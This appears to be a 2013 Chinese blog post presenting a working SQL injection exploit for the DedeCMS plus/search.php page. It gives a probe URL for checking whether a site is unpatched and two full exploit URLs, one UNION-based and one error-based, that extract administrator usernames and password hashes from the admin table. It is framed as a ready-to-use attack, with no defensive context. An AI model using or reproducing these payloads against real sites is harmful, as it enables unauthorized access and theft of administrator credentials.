User-Profile-Image
hankin
  • 5
  • 分类
    • 播客有声小说
    • 商业源码
    • seo搜索引擎优化
    • php教程
  • 页面
    • tags标签
    • 关于书生
    • 友情链接
    • 搜索
    • 文章列表
    • 留言板
  • 友链
      请到[后台->主题设置->友情链接]中设置。
Help?

Please contact us on our email for need any support

Support
    首页   ›   商业源码   ›   正文
商业源码

2013 dedecms织梦注入漏洞EXP 爆破账号密码

2013-05-25 16:44:53
8536  0 1

通杀dedecms plus/search.php 注入漏洞利用EXP

测试方式:

提交:http://www.luoyangshusheng.com/plus/search.php?keyword=as&typeArr[ uNion ]=a

看结果如果提示

Safe Alert: Request Error step 2 !

那么恭喜你 对方还没打补丁 漏洞可用

漏洞利用EXP:http://www.luoyangshusheng.com/plus/search.php?keyword=as&typeArr[111%3D@`\’`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\’`+]=a

如果提示的是下面这段代码

Safe Alert: Request Error step 1 !

那么直接用下面的exp:

http://www.luoyangshusheng.com/plus/search.php?keyword=as&typeArr[111%3D@`\’`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\’`+]=a

评论 (0)

点击这里取消回复。

欢迎您 游客  

洛阳书生
头像
4文章 340评论 3点赞 60351浏览
博客统计
  • 日志总数:4 篇
  • 评论数目:361 条
  • 建站日期:2013-01-27
  • 运行天数:2952 天
  • 标签总数:2 个
  • 最后更新:2020-10-4
最新评论
+1
Copyright © 2021 网站备案号: 豫ICP备15011346号 www.luoyangshusheng.com
smarty_hankin 主题. Designed by hankin
主页
页面
  • tags标签
  • 关于书生
  • 友情链接
  • 搜索
  • 文章列表
  • 留言板
博主
洛阳书生 管理员
专注于洛阳seo_洛阳网站建设与网络营销_手机html5应用开发
4 文章 340 评论 60351 浏览
测试
测试